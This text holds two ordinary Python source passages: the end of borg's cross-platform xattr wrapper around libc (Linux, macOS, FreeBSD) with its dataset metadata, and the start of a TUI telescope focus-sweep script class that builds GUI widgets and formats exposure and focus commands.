"""split a list of zero-terminated strings into python not-zero-terminated bytes"""
return buf.split(b'\0')[:-1]
def split_lstring(buf):
"""split a list of length-prefixed strings into python not-length-prefixed bytes"""
result = []
mv = memoryview(buf)
while mv:
length = mv[0]
result.append(bytes(mv[1:1 + length]))
mv = mv[1 + length:]
return result
class BufferTooSmallError(Exception):
"""the buffer given to a xattr function was too small for the result."""
def _check(rv, path=None, detect_buffer_too_small=False):
if rv < 0:
e = get_errno()
if detect_buffer_too_small and e == errno.ERANGE:
# listxattr and getxattr signal with ERANGE that they need a bigger result buffer.
# setxattr signals this way that e.g. a xattr key name is too long / inacceptable.
raise BufferTooSmallError
else:
try:
msg = os.strerror(e)
except ValueError:
msg = ''
if isinstance(path, int):
path = '<FD %d>' % path
raise OSError(e, msg, path)
if detect_buffer_too_small and rv >= len(buffer):
# freebsd does not error with ERANGE if the buffer is too small,
# it just fills the buffer, truncates and returns.
# so, we play sure and just assume that result is truncated if
# it happens to be a full buffer.
raise BufferTooSmallError
return rv
def _listxattr_inner(func, path):
if isinstance(path, str):
path = os.fsencode(path)
size = len(buffer)
while True:
buf = buffer.get(size)
try:
n = _check(func(path, buf, size), path, detect_buffer_too_small=True)
except BufferTooSmallError:
size *= 2
else:
return n, buf.raw
def _getxattr_inner(func, path, name):
if isinstance(path, str):
path = os.fsencode(path)
name = os.fsencode(name)
size = len(buffer)
while True:
buf = buffer.get(size)
try:
n = _check(func(path, name, buf, size), path, detect_buffer_too_small=True)
except BufferTooSmallError:
size *= 2
else:
return n, buf.raw
def _setxattr_inner(func, path, name, value):
if isinstance(path, str):
path = os.fsencode(path)
name = os.fsencode(name)
value = value and os.fsencode(value)
size = len(value) if value else 0
_check(func(path, name, value, size), path, detect_buffer_too_small=False)
if sys.platform.startswith('linux'): # pragma: linux only
libc.llistxattr.argtypes = (c_char_p, c_char_p, c_size_t)
libc.llistxattr.restype = c_ssize_t
libc.flistxattr.argtypes = (c_int, c_char_p, c_size_t)
libc.flistxattr.restype = c_ssize_t
libc.lsetxattr.argtypes = (c_char_p, c_char_p, c_char_p, c_size_t, c_int)
libc.lsetxattr.restype = c_int
libc.fsetxattr.argtypes = (c_int, c_char_p, c_char_p, c_size_t, c_int)
libc.fsetxattr.restype = c_int
libc.lgetxattr.argtypes = (c_char_p, c_char_p, c_char_p, c_size_t)
libc.lgetxattr.restype = c_ssize_t
libc.fgetxattr.argtypes = (c_int, c_char_p, c_char_p, c_size_t)
libc.fgetxattr.restype = c_ssize_t
def listxattr(path, *, follow_symlinks=True):
def func(path, buf, size):
if isinstance(path, int):
return libc.flistxattr(path, buf, size)
else:
if follow_symlinks:
return libc.listxattr(path, buf, size)
else:
return libc.llistxattr(path, buf, size)
n, buf = _listxattr_inner(func, path)
return [os.fsdecode(name) for name in split_string0(buf[:n])
if name and not name.startswith(b'system.posix_acl_')]
def getxattr(path, name, *, follow_symlinks=True):
def func(path, name, buf, size):
if isinstance(path, int):
return libc.fgetxattr(path, name, buf, size)
else:
if follow_symlinks:
return libc.getxattr(path, name, buf, size)
else:
return libc.lgetxattr(path, name, buf, size)
n, buf = _getxattr_inner(func, path, name)
return buf[:n] or None
def setxattr(path, name, value, *, follow_symlinks=True):
def func(path, name, value, size):
flags = 0
if isinstance(path, int):
return libc.fsetxattr(path, name, value, size, flags)
else:
if follow_symlinks:
return libc.setxattr(path, name, value, size, flags)
else:
return libc.lsetxattr(path, name, value, size, flags)
_setxattr_inner(func, path, name, value)
elif sys.platform == 'darwin': # pragma: darwin only
libc.listxattr.argtypes = (c_char_p, c_char_p, c_size_t, c_int)
libc.listxattr.restype = c_ssize_t
libc.flistxattr.argtypes = (c_int, c_char_p, c_size_t)
libc.flistxattr.restype = c_ssize_t
libc.setxattr.argtypes = (c_char_p, c_char_p, c_char_p, c_size_t, c_uint32, c_int)
libc.setxattr.restype = c_int
libc.fsetxattr.argtypes = (c_int, c_char_p, c_char_p, c_size_t, c_uint32, c_int)
libc.fsetxattr.restype = c_int
libc.getxattr.argtypes = (c_char_p, c_char_p, c_char_p, c_size_t, c_uint32, c_int)
libc.getxattr.restype = c_ssize_t
libc.fgetxattr.argtypes = (c_int, c_char_p, c_char_p, c_size_t, c_uint32, c_int)
libc.fgetxattr.restype = c_ssize_t
XATTR_NOFLAGS = 0x0000
XATTR_NOFOLLOW = 0x0001
def listxattr(path, *, follow_symlinks=True):
def func(path, buf, size):
if isinstance(path, int):
return libc.flistxattr(path, buf, size, XATTR_NOFLAGS)
else:
if follow_symlinks:
return libc.listxattr(path, buf, size, XATTR_NOFLAGS)
else:
return libc.listxattr(path, buf, size, XATTR_NOFOLLOW)
n, buf = _listxattr_inner(func, path)
return [os.fsdecode(name) for name in split_string0(buf[:n]) if name]
def getxattr(path, name, *, follow_symlinks=True):
def func(path, name, buf, size):
if isinstance(path, int):
return libc.fgetxattr(path, name, buf, size, 0, XATTR_NOFLAGS)
else:
if follow_symlinks:
return libc.getxattr(path, name, buf, size, 0, XATTR_NOFLAGS)
else:
return libc.getxattr(path, name, buf, size, 0, XATTR_NOFOLLOW)
n, buf = _getxattr_inner(func, path, name)
return buf[:n] or None
def setxattr(path, name, value, *, follow_symlinks=True):
def func(path, name, value, size):
if isinstance(path, int):
return libc.fsetxattr(path, name, value, size, 0, XATTR_NOFLAGS)
else:
if follow_symlinks:
return libc.setxattr(path, name, value, size, 0, XATTR_NOFLAGS)
else:
return libc.setxattr(path, name, value, size, 0, XATTR_NOFOLLOW)
_setxattr_inner(func, path, name, value)
elif sys.platform.startswith('freebsd'): # pragma: freebsd only
libc.extattr_list_fd.argtypes = (c_int, c_int, c_char_p, c_size_t)
libc.extattr_list_fd.restype = c_ssize_t
libc.extattr_list_link.argtypes = (c_char_p, c_int, c_char_p, c_size_t)
libc.extattr_list_link.restype = c_ssize_t
libc.extattr_list_file.argtypes = (c_char_p, c_int, c_char_p, c_size_t)
libc.extattr_list_file.restype = c_ssize_t
libc.extattr_get_fd.argtypes = (c_int, c_int, c_char_p, c_char_p, c_size_t)
libc.extattr_get_fd.restype = c_ssize_t
libc.extattr_get_link.argtypes = (c_char_p, c_int, c_char_p, c_char_p, c_size_t)
libc.extattr_get_link.restype = c_ssize_t
libc.extattr_get_file.argtypes = (c_char_p, c_int, c_char_p, c_char_p, c_size_t)
libc.extattr_get_file.restype = c_ssize_t
libc.extattr_set_fd.argtypes = (c_int, c_int, c_char_p, c_char_p, c_size_t)
libc.extattr_set_fd.restype = c_int
libc.extattr_set_link.argtypes = (c_char_p, c_int, c_char_p, c_char_p, c_size_t)
libc.extattr_set_link.restype = c_int
libc.extattr_set_file.argtypes = (c_char_p, c_int, c_char_p, c_char_p, c_size_t)
libc.extattr_set_file.restype = c_int
ns = EXTATTR_NAMESPACE_USER = 0x0001
def listxattr(path, *, follow_symlinks=True):
def func(path, buf, size):
if isinstance(path, int):
return libc.extattr_list_fd(path, ns, buf, size)
else:
if follow_symlinks:
return libc.extattr_list_file(path, ns, buf, size)
else:
return libc.extattr_list_link(path, ns, buf, size)
n, buf = _listxattr_inner(func, path)
return [os.fsdecode(name) for name in split_lstring(buf[:n]) if name]
def getxattr(path, name, *, follow_symlinks=True):
def func(path, name, buf, size):
if isinstance(path, int):
return libc.extattr_get_fd(path, ns, name, buf, size)
else:
if follow_symlinks:
return libc.extattr_get_file(path, ns, name, buf, size)
else:
return libc.extattr_get_link(path, ns, name, buf, size)
n, buf = _getxattr_inner(func, path, name)
return buf[:n] or None
def setxattr(path, name, value, *, follow_symlinks=True):
def func(path, name, value, size):
if isinstance(path, int):
return libc.extattr_set_fd(path, ns, name, value, size)
else:
if follow_symlinks:
return libc.extattr_set_file(path, ns, name, value, size)
else:
return libc.extattr_set_link(path, ns, name, value, size)
_setxattr_inner(func, path, name, value)
else: # pragma: unknown platform only
def listxattr(path, *, follow_symlinks=True):
"""
Return list of xattr names on a file.
*path* can either be a path (str or bytes) or an open file descriptor (int).
*follow_symlinks* indicates whether symlinks should be followed
and only applies when *path* is not an open file descriptor.
"""
return []
def getxattr(path, name, *, follow_symlinks=True):
"""
Read xattr and return its value (as bytes) or None if its empty.
*path* can either be a path (str or bytes) or an open file descriptor (int).
*name* is the name of the xattr to read (str).
*follow_symlinks* indicates whether symlinks should be followed
and only applies when *path* is not an open file descriptor.
"""
def setxattr(path, name, value, *, follow_symlinks=True):
"""
Write xattr on *path*.
*path* can either be a path (str or bytes) or an open file descriptor (int).
*name* is the name of the xattr to read (str).
*value* is the value to write. It is either bytes or None. The latter
signals that the value shall be empty (size equals zero).
*follow_symlinks* indicates whether symlinks should be followed
and only applies when *path* is not an open file descriptor.
"""
| {
"repo_name": "edgewood/borg",
"path": "src/borg/xattr.py",
"copies": "4",
"size": "15445",
"license": "bsd-3-clause",
"hash": 1968446070974473500,
"line_mean": 38.8067010309,
"line_max": 116,
"alpha_frac": 0.6055033992,
"autogenerated": false,
"ratio": 3.423093971631206,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.6028597370831206,
"avg_score": null,
"num_lines": null
} |
"""A basic focus script for slitviewers
(changes will be required for gcam and instruments).
Subclass for more functionality.
Take a series of exposures at different focus positions to estimate best focus.
Note:
- The script runs in two phases:
1) If a slitviewer:
Move the boresight and take an exposure. Then pause.
The user is expected to acquire a suitable star before resuming.
Once this phase begins (i.e. once you start the script)
changes to boresight offset are ignored.
Other imagers:
Take an exposure and look for the best centroidable star. Then pause.
The user is expected to acquire a suitable star before resuming.
2) Take the focus sweep.
Once this phase begins all inputs are ignored.
History:
2006-11-07 ROwen From DIS:Focus, which was from NICFPS:Focus.
2006-11-09 ROwen Removed use of plotAxis.autoscale_view(scalex=False, scaley=True)
since it was not compatible with older versions of matplotlib.
Stopped using float("nan") since it doesn't work on all pythons.
Modified to always pause before the focus sweep.
Modified to window the exposure.
2006-11-13 ROwen Modified to have user set center focus and range.
Added Expose and Sweep buttons.
2006-12-01 ROwen Refactored to make it easier to use for non-slitviewers:
- Added waitFocusSweep method.
- Modified to use focPosFWHMList instead of two lists.
Improved sanity-checking the best focus fit.
Created SlitviewerFocusScript and OffsetGuiderFocusScript classes;
the latter is not yet fully written.
2006-12-08 ROwen More refactoring. Created ImagerFocusScript class.
Needs extensive testing.
2006-12-13 ROwen Added Find button and changed Centroid to Measure.
Data is always nulled at start of sweep. This is much easier than
trying to be figure out when I can safely keep existing data.
Fit error is logged.
Fit is logged and graphed even if fit is rejected (unless fit is a maximum).
Changed from Numeric to numarray to avoid a bug in matplotlib 0.87.7
Changed test for max fit focus error to a multiple of the focus range.
2006-12-28 ROwen Bug fix: tried to send <inst>Expose time=<time> bin=<binfac>
command for imaging instruments. The correct command is:
<inst>Expose object time=<time>.
Noted that bin factor and window must be configured via special
instrument-specific commands.
ImagerFocusScript no longer makes use of windowing (while centroiding),
though a subclass could do so.
2006-12-28 ROwen ImagerFocusScript.waitExpose now aborts the exposure if the script is aborted.
This change did not get into TUI 1.3a11. Note that this fix only applies to imaging
instruments; there is not yet any documented way to abort a guider exposure.
2007-01-02 ROwen Fixed a bug in waitExpose: <inst> <inst>Expose -> <instExpose>.
Fixed a bug in waitFindStar: centroidRad used but not supplied.
Improved help text for Star Pos entry widgets.
2007-01-03 ROwen Bug fixes:
- Used sr instead of self.sr in two places.
- ImagerFocusScript.getCentroidArgs returned bad
starpos due to wanting to window.
- ImagerFocusScript.waitCentroid failed if no star found
rather than returning sr.value = None.
2007-01-12 ROwen Added a threshold for star finding (maxFindAmpl).
Added logging of sky and star amplitude.
2007-01-26 ROwen Tweak various formats:
- All reported and command floats use %0.xf (some used %.xf).
- Focus is rounded to nearest integer for logging and setting.
If new focus found, set Center Focus to the new value.
Increased minimum # of focus positions from 2 to 3.
Bug fix: if only 3 measurements, divided by zero while computing std. dev.
Bug fix: could not restore initial focus (missing = in set focus command).
Minor bug fix: focus interval was computed as int, not float.
2007-01-29 ROwen Improved OffsetGuiderFocusScript to get guider info based on instPos
instead of insisting that the guider be the current instrument.
Modified to take advantage of RO.Wdg.Entry's new label attribute.
2007-01-29 ROwen Fixed ImagerFocusScript (it was giving an illegal arg to OffsetGuiderFocusScript).
Refactored so run is in BaseFocusScript and ImagerFocusScript inherits from that.
Renamed extraSetup method to waitExtraSetup.
2007-02-13 ROwen Added a Clear button.
Never auto-clears the log.
Waits to auto-clear the graph until new data is about to be graphed.
Simplified graph range handling.
2007-04-24 ROwen Modified to use numpy instead of numarray.
2007-06-01 ROwen Hacked in support for sfocus for SPIcam.
2007-06-04 ROwen Added doWindow argument to BaseFocusScript.
2007-07-25 ROwen ImagerFocusScript modified to sending windowing info as part of the expose command
if windowing is being used (due to improvements in spicamExpose).
Pings the gcam actor when it starts. This eliminates the situation where the actor
is dead and the script should halt, but keeps exposing and reporting fwhm=NaN instead.
2007-07-26 ROwen Added user-settable bin factor.
Modified to take a final exposure (after restoring boresight) if boresight moved.
2007-07-27 ROwen Increased the fidelity of debug mode and fixed some bugs.
2007-07-30 ROwen Added windowOrigin and windowIsInclusive arguments.
Bug fix: if the user changed the bin factor during script execution,
it would change the bin factor used in the script (and not necessarily properly).
2007-09-12 ROwen SlitviewerFocusScript bug fix: Cancel would fail if no image ever taken.
2007-12-20 ROwen Moved matplotlib configuration statements to TUI's startup because
in matplotlib 0.91.1 one may not call "use" after importing matplotlib.backends.
2008-01-24 ROwen BaseFocusScript bug fixes:
- PR 686: Find button broken (waitFindStar ran "expose" instead of "findstars"
and so never found anything.).
- recordUserParams didn't round window so relStarPos could be off by a fraction of a pixel.
2008-01-25 ROwen Added a digit after the decimal point for reporting fwhm in arcsec.
Implemented a lower limit on focus increment.
2008-02-01 ROwen Changed configuration constants from globals to class variables of BaseFocusScript
so subclasses can more easily override them.
Fixed debug mode to use proper defaults for number of steps and focus range.
Setting current focus successfully clears the status bar.
2008-03-28 ROwen PR 775: used exposeModel in classes where it did not exist.
Fixed by adding tccInstPrefix argument.
2008-04-02 ROwen PR 781: Many focus scripts fail to start with TypeError...:
BaseFocusScript.getInstInfo was missing () on a string method lower()
2008-04-22 ROwen Modified to use new Log.addMsg method.
2008-04-23 ROwen Added some diagnostic output for PR 777 and its kin.
2008-04-29 ROwen Open guide image window *after* checking for correct instrument.
2008-08-14 ROwen CR 818: take a final full-frame exposure if script windows
(or, as before, if boresight was restored).
2009-03-02 ROwen Added a brief header for PR 777 diagnostic output.
2010-03-12 ROwen Changed to use Models.getModel.
2015-11-03 ROwen Replace "== None" with "is None" and "!= None" with "is not None" to modernize the code.
"""
import inspect
import math
import random # for debug
import numpy
import Tkinter
import RO.Wdg
import RO.CnvUtil
import RO.Constants
import RO.StringUtil
import TUI.Models
import TUI.Inst.ExposeModel
import matplotlib
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
MicronStr = RO.StringUtil.MuStr + "m"
def formatNum(val, fmt="%0.1f"):
"""Convert a number into a string
None is returned as NaN
"""
if val is None:
return "NaN"
try:
return fmt % (val,)
except TypeError:
raise TypeError("formatNum failed on fmt=%r, val=%r" % (fmt, val))
class Extremes(object):
"""Class to keep track of minimum and maximum value.
"""
def __init__(self, val=None):
self.minVal = None
self.maxVal = None
if val is not None:
self.addVal(val)
def addVal(self, val):
if val is None:
return
if self.isOK():
self.minVal = min(self.minVal, val)
self.maxVal = max(self.maxVal, val)
else:
self.minVal = val
self.maxVal = val
def isOK(self):
return self.minVal is not None
def __eq__(self, other):
return (self.minVal == other.minVal) and (self.maxVal == other.maxVal)
def __str__(self):
return "[%s, %s]" % (self.minVal, self.maxVal)
def __repr__(self):
return "Extremes(%s, %s)" % (self.minVal, self.maxVal)
class StarMeas(object):
def __init__(self,
xyPos = None,
sky = None,
ampl = None,
fwhm = None,
):
self.xyPos = xyPos
self.sky = sky
self.ampl = ampl
self.fwhm = fwhm
def fromStarKey(cls, starKeyData):
"""Create an instance from star keyword data.
"""
return cls(
fwhm = starKeyData[8],
sky = starKeyData[13],
ampl = starKeyData[14],
xyPos = starKeyData[2:4],
)
fromStarKey = classmethod(fromStarKey)
def makeStarData(
typeChar = "f",
xyPos = (10.0, 10.0),
sky = 200,
ampl = 1500,
fwhm = 2.5,
):
"""Make a list containing one star data list for debug mode"""
xyPos = [float(xyPos[ii]) for ii in range(2)]
fwhm = float(fwhm)
return [[typeChar, 1, xyPos[0], xyPos[1], 1.0, 1.0, fwhm * 5, 1, fwhm, fwhm, 0, 0, ampl, sky, ampl]]
class BaseFocusScript(object):
"""Basic focus script object.
This is a virtual base class. The inheritor must:
- Provide widgets
- Provide a "run" method
Inputs:
- gcamActor: name of guide camera actor (e.g. "dcam")
- instName: name of instrument (e.g. "DIS"); must be a name known to TUI.Inst.ExposeModel.
- tccInstPrefix: instrument name as known by the TCC; defaults to instName;
if the instrument has multiple names in the TCC then supply the common prefix
- imageViewerTLName: name of image viewer toplevel (e.g. "Guide.DIS Slitviewer")
- defRadius: default centroid radius, in arcsec
- defBinFactor: default bin factor; if None then bin factor cannot be set
- canSetStarPos: if True the user can set the star position;
if False then the Star Pos entries and Find button are not shown.
- maxFindAmpl: maximum star amplitude for finding stars (peak - sky in ADUs);
if None then star finding is disabled.
- doWindow: if True, subframe images during focus sequence
- windowOrigin: index of left or lower pixel for window (0 or 1 unless very wierd);
this is not use for star positions, which all have the same convention
- windowIsInclusive: is the upper-right window coord included in the image?
- helpURL: URL of help file
- debug: if True, run in debug mode, which uses fake data and does not communicate with the hub.
"""
cmd_Find = "find"
cmd_Measure = "measure"
cmd_Sweep = "sweep"
# constants
#DefRadius = 5.0 # centroid radius, in arcsec
#NewStarRad = 2.0 # amount of star position change to be considered a new star
DefFocusNPos = 5 # number of focus positions
DefFocusRange = 200 # default focus range around current focus
FocusWaitMS = 1000 # time to wait after every focus adjustment (ms)
BacklashComp = 0 # amount of backlash compensation, in microns (0 for none)
WinSizeMult = 2.5 # window radius = centroid radius * WinSizeMult
FocGraphMargin = 5 # margin on graph for x axis limits, in um
MaxFocSigmaFac = 0.5 # maximum allowed sigma of best fit focus as a multiple of focus range
MinFocusIncr = 50 # minimum focus increment, in um
def __init__(self,
sr,
gcamActor,
instName,
tccInstPrefix = None,
imageViewerTLName = None,
defRadius = 5.0,
defBinFactor = 1,
canSetStarPos = True,
maxFindAmpl = None,
doWindow = True,
windowOrigin = 0,
windowIsInclusive = True,
helpURL = None,
debug = False,
):
"""The setup script; run once when the script runner
window is created.
"""
self.sr = sr
sr.debug = bool(debug)
self.gcamActor = gcamActor
self.instName = instName
self.tccInstPrefix = tccInstPrefix or self.instName
self.imageViewerTLName = imageViewerTLName
if defBinFactor is None:
self.defBinFactor = None
self.binFactor = 1
self.dispBinFactor = 1
else:
self.defBinFactor = int(defBinFactor)
self.binFactor = self.defBinFactor
self.dispBinFactor = self.defBinFactor
self.defRadius = defRadius
self.helpURL = helpURL
self.canSetStarPos = canSetStarPos
self.maxFindAmpl = maxFindAmpl
self.doWindow = bool(doWindow)
self.windowOrigin = int(windowOrigin)
self.windowIsInclusive = bool(windowIsInclusive)
# fake data for debug mode
self.debugIterFWHM = None
# get various models
self.tccModel = TUI.Models.getModel("tcc")
self.tuiModel = TUI.Models.getModel("tui")
self.guideModel = TUI.Models.getModel(self.gcamActor)
# create and grid widgets
self.gr = RO.Wdg.Gridder(sr.master, sticky="ew")
self.createSpecialWdg()
self.createStdWdg()
self.initAll()
# try to get focus away from graph (but it doesn't work; why?)
self.expTimeWdg.focus_set()
self.setCurrFocus()
def createSpecialWdg(self):
"""Create script-specific widgets.
"""
pass
def createStdWdg(self):
"""Create the standard widgets.
"""
sr = self.sr
self.expTimeWdg = RO.Wdg.FloatEntry(
sr.master,
label = "Exposure Time",
minValue = self.guideModel.gcamInfo.minExpTime,
maxValue = self.guideModel.gcamInfo.maxExpTime,
defValue = self.guideModel.gcamInfo.defExpTime,
defFormat = "%0.1f",
defMenu = "Default",
minMenu = "Minimum",
helpText = "Exposure time",
helpURL = self.helpURL,
)
self.gr.gridWdg(self.expTimeWdg.label, self.expTimeWdg, "sec")
self.binFactorWdg = RO.Wdg.IntEntry(
master = sr.master,
label = "Bin Factor",
minValue = 1,
maxValue = 1024,
defValue = self.defBinFactor or 1,
defMenu = "Default",
callFunc = self.updBinFactor,
helpText = "Bin factor (for rows and columns)",
helpURL = self.helpURL,
)
if self.defBinFactor is not None:
self.gr.gridWdg(self.binFactorWdg.label, self.binFactorWdg)
self.starPosWdgSet = []
for ii in range(2):
letter = ("X", "Y")[ii]
starPosWdg = RO.Wdg.FloatEntry(
master = sr.master,
label = "Star Pos %s" % (letter,),
minValue = 0,
maxValue = 5000,
helpText = "Star %s position (binned, full frame)" % (letter,),
helpURL = self.helpURL,
)
if self.canSetStarPos:
self.gr.gridWdg(starPosWdg.label, starPosWdg, "pix")
self.starPosWdgSet.append(starPosWdg)
self.centroidRadWdg = RO.Wdg.IntEntry(
master = sr.master,
label = "Centroid Radius",
minValue = 5,
maxValue = 1024,
defValue = self.defRadius,
defMenu = "Default",
helpText = "Centroid radius; don't skimp",
helpURL = self.helpURL,
)
self.gr.gridWdg(self.centroidRadWdg.label, self.centroidRadWdg, "arcsec", sticky="ew")
setCurrFocusWdg = RO.Wdg.Button(
master = sr.master,
text = "Center Focus",
callFunc = self.setCurrFocus,
helpText = "Set to current focus",
helpURL = self.helpURL,
)
self.centerFocPosWdg = RO.Wdg.IntEntry(
master = sr.master,
label = "Center Focus",
defValue = 0,
defMenu = "Default",
helpText = "Center of focus sweep",
helpURL = self.helpURL,
)
self.gr.gridWdg(setCurrFocusWdg, self.centerFocPosWdg, MicronStr)
self.focusRangeWdg = RO.Wdg.IntEntry(
master = sr.master,
label = "Focus Range",
maxValue = self.DefFocusRange * 10,
defValue = self.DefFocusRange,
defMenu = "Default",
helpText = "Range of focus sweep",
helpURL = self.helpURL,
)
self.gr.gridWdg(self.focusRangeWdg.label, self.focusRangeWdg, MicronStr)
self.numFocusPosWdg = RO.Wdg.IntEntry(
master = sr.master,
label = "Focus Positions",
minValue = 3,
defValue = self.DefFocusNPos,
defMenu = "Default",
helpText = "Number of focus positions for sweep",
helpURL = self.helpURL,
)
self.gr.gridWdg(self.numFocusPosWdg.label, self.numFocusPosWdg, "")
self.focusIncrWdg = RO.Wdg.FloatEntry(
master = sr.master,
label = "Focus Increment",
defFormat = "%0.1f",
readOnly = True,
relief = "flat",
helpText = "Focus step size; must be at least %s %s" % (self.MinFocusIncr, MicronStr),
helpURL = self.helpURL,
)
self.gr.gridWdg(self.focusIncrWdg.label, self.focusIncrWdg, MicronStr)
# create the move to best focus checkbox
self.moveBestFocus = RO.Wdg.Checkbutton(
master = sr.master,
text = "Move to Best Focus",
defValue = True,
relief = "flat",
helpText = "Move to estimated best focus and measure FWHM after sweep?",
helpURL = self.helpURL,
)
self.gr.gridWdg(None, self.moveBestFocus, colSpan = 3, sticky="w")
graphCol = self.gr.getNextCol()
graphRowSpan = self.gr.getNextRow()
# table of measurements (including separate unscrolled header)
TableWidth = 32
self.logHeader = RO.Wdg.Text(
master = sr.master,
readOnly = True,
height = 2,
width = TableWidth,
helpText = "Measured and fit results",
helpURL = self.helpURL,
relief = "sunken",
bd = 0,
)
self.logHeader.insert("0.0", """\tfocus\tFWHM\tFWHM\tsky\tampl\tsky+ampl
\t%s\tpixels\tarcsec\tADUs\tADUs\tADUs""" % MicronStr)
self.logHeader.setEnable(False)
self.gr.gridWdg(False, self.logHeader, sticky="ew", colSpan = 10)
self.logWdg = RO.Wdg.LogWdg(
master = sr.master,
height = 10,
width = TableWidth,
helpText = "Measured and fit results",
helpURL = self.helpURL,
relief = "sunken",
bd = 2,
)
self.gr.gridWdg(False, self.logWdg, sticky="ew", colSpan = 10)
# graph of measurements
plotFig = matplotlib.figure.Figure(figsize=(4, 1), frameon=True)
self.figCanvas = FigureCanvasTkAgg(plotFig, sr.master)
self.figCanvas.get_tk_widget().grid(row=0, column=graphCol, rowspan=graphRowSpan, sticky="news")
self.plotAxis = plotFig.add_subplot(1, 1, 1)
self.focusRangeWdg.addCallback(self.updFocusIncr, callNow=False)
self.numFocusPosWdg.addCallback(self.updFocusIncr, callNow=True)
# add command buttons
cmdBtnFrame = Tkinter.Frame(sr.master)
self.findBtn = RO.Wdg.Button(
master = cmdBtnFrame,
text = "Find",
callFunc = RO.Alg.GenericCallback(self.doCmd, self.cmd_Find),
helpText = "Update focus, expose and find best star",
helpURL = self.helpURL,
)
if self.maxFindAmpl is not None:
self.findBtn.pack(side="left")
self.measureBtn = RO.Wdg.Button(
master = cmdBtnFrame,
text = "Measure",
callFunc = RO.Alg.GenericCallback(self.doCmd, self.cmd_Measure),
helpText = "Update focus, expose and measure FWHM",
helpURL = self.helpURL,
)
self.measureBtn.pack(side="left")
self.sweepBtn = RO.Wdg.Button(
master = cmdBtnFrame,
text = "Sweep",
callFunc = RO.Alg.GenericCallback(self.doCmd, self.cmd_Sweep),
helpText = "Start focus sweep",
helpURL = self.helpURL,
)
self.sweepBtn.pack(side="left")
self.clearBtn = RO.Wdg.Button(
master = cmdBtnFrame,
text = "Clear",
callFunc = self.doClear,
helpText = "Clear table and graph",
helpURL = self.helpURL,
)
self.clearBtn.pack(side="right")
nCol = self.gr.getMaxNextCol()
self.gr.gridWdg(False, cmdBtnFrame, colSpan=nCol)
if sr.debug:
self.expTimeWdg.set("1")
self.centerFocPosWdg.set(0)
def clearGraph(self):
self.plotAxis.clear()
self.plotAxis.grid(True)
# start with autoscale disabled due to bug in matplotlib
self.plotAxis.set_autoscale_on(False)
self.figCanvas.draw()
self.plotLine = None
def doClear(self, wdg=None):
self.logWdg.clearOutput()
self.clearGraph()
def doCmd(self, cmdMode, wdg=None):
if cmdMode not in (
self.cmd_Measure,
self.cmd_Find,
self.cmd_Sweep,
):
raise self.sr.RuntimeError("Unknown command mode %r" % (cmdMode,))
self.cmdMode = cmdMode
self.sr.resumeUser()
def enableCmdBtns(self, doEnable):
"""Enable or disable command buttons (e.g. Expose and Sweep).
"""
self.findBtn.setEnable(doEnable)
self.measureBtn.setEnable(doEnable)
self.sweepBtn.setEnable(doEnable)
self.clearBtn.setEnable(doEnable)
def end(self, sr):
"""Run when script exits (normally or due to error)
"""
self.enableCmdBtns(False)
if self.focPosToRestore is not None:
tccCmdStr = "set focus=%0.0f" % (self.focPosToRestore,)
if self.sr.debug:
print "end is restoring the focus: %r" % tccCmdStr
sr.startCmd(
actor = "tcc",
cmdStr = tccCmdStr,
)
doRestoreBoresight = self.begBoreXYDeg != self.currBoreXYDeg
if doRestoreBoresight:
if self.sr.debug:
print "end is restoring the boresight"
self.moveBoresight(
self.begBoreXYDeg,
doWait = False,
)
if self.didTakeImage and (self.doWindow or doRestoreBoresight):
if self.sr.debug:
print "end is taking a final exposure"
exposeCmdDict = self.getExposeCmdDict(doWindow=False)
sr.startCmd(**exposeCmdDict)
def formatBinFactorArg(self):
"""Return bin factor argument for expose/centroid/findstars command"""
#print "defBinFactor=%r, binFactor=%r" % (self.defBinFactor, self.binFactor)
# if defBinFactor None then bin factor cannot be set
if self.defBinFactor is None:
return ""
return "bin=%d" % (self.binFactor,)
def formatExposeArgs(self, doWindow=True):
"""Format arguments for exposure command.
Inputs:
- doWindow: if true, window the exposure (if permitted)
"""
argList = [
"time=%s" % (self.expTime,),
self.formatBinFactorArg(),
self.formatWindowArg(doWindow),
]
argList = [arg for arg in argList if arg]
return " ".join(argList)
def formatWindowArg(self, doWindow=True):
"""Format window argument for expose/centroid/findstars command.
Inputs:
- doWindow: if true, window the exposure (if permitted)
"""
if not doWindow or not self.doWindow:
return ""
if self.windowIsInclusive:
urOffset = self.windowOrigin
else:
urOffset = self.windowOrigin + 1
windowLL = [self.window[ii] + self.windowOrigin for ii in range(2)]
windowUR = [self.window[ii+2] + urOffset for ii in range(2)]
return "window=%d,%d,%d,%d" % (windowLL[0], windowLL[1], windowUR[0], windowUR[1])
def getInstInfo(self):
"""Obtains instrument data.
Verifies the correct instrument and sets these attributes:
- instScale: x,y image scale in unbinned pixels/degree
- instCtr: x,y image center in unbinned pixels
- instLim: xmin, ymin, xmax, ymax image limits, inclusive, in unbinned pixels
- arcsecPerPixel: image scale in arcsec/unbinned pixel;
average of x and y scales
Raises ScriptError if wrong instrument.
"""
sr = self.sr
if self.tccInstPrefix and not sr.debug:
# Make sure current instrument is correct
try:
currInstName = sr.getKeyVar(self.tccModel.inst)
except sr.ScriptError:
raise sr.ScriptError("current instrument unknown")
if not currInstName.lower().startswith(self.tccInstPrefix.lower()):
raise sr.ScriptError("%s is not the current instrument (%s)!" % (self.instName, currInstName))
self.instScale = sr.getKeyVar(self.tccModel.iimScale, ind=None)
self.instCtr = sr.getKeyVar(self.tccModel.iimCtr, ind=None)
self.instLim = sr.getKeyVar(self.tccModel.iimLim, ind=None)
else:
# data from tcc tinst:I_NA2_DIS.DAT 18-OCT-2006
self.instScale = [-12066.6, 12090.5] # unbinned pixels/deg
self.instCtr = [240, 224]
self.instLim = [0, 0, 524, 511]
self.arcsecPerPixel = 3600.0 * 2 / (abs(self.instScale[0]) + abs(self.instScale[1]))
def getEntryNum(self, wdg):
"""Return the numeric value of a widget, or raise ScriptError if blank.
"""
numVal = wdg.getNumOrNone()
if numVal is not None:
return numVal
raise self.sr.ScriptError(wdg.label + " not specified")
def getExposeCmdDict(self, doWindow=True):
"""Get basic command arument dict for an expose command
This includes actor, cmdStr, abortCmdStr
"""
return dict(
actor = self.gcamActor,
cmdStr = "expose " + self.formatExposeArgs(doWindow),
abortCmdStr = "abort",
)
def graphFocusMeas(self, focPosFWHMList, extremeFocPos=None, extremeFWHM=None):
"""Graph measured fwhm vs focus.
Inputs:
- focPosFWHMList: list of data items:
- focus position (um)
- measured FWHM (binned pixels)
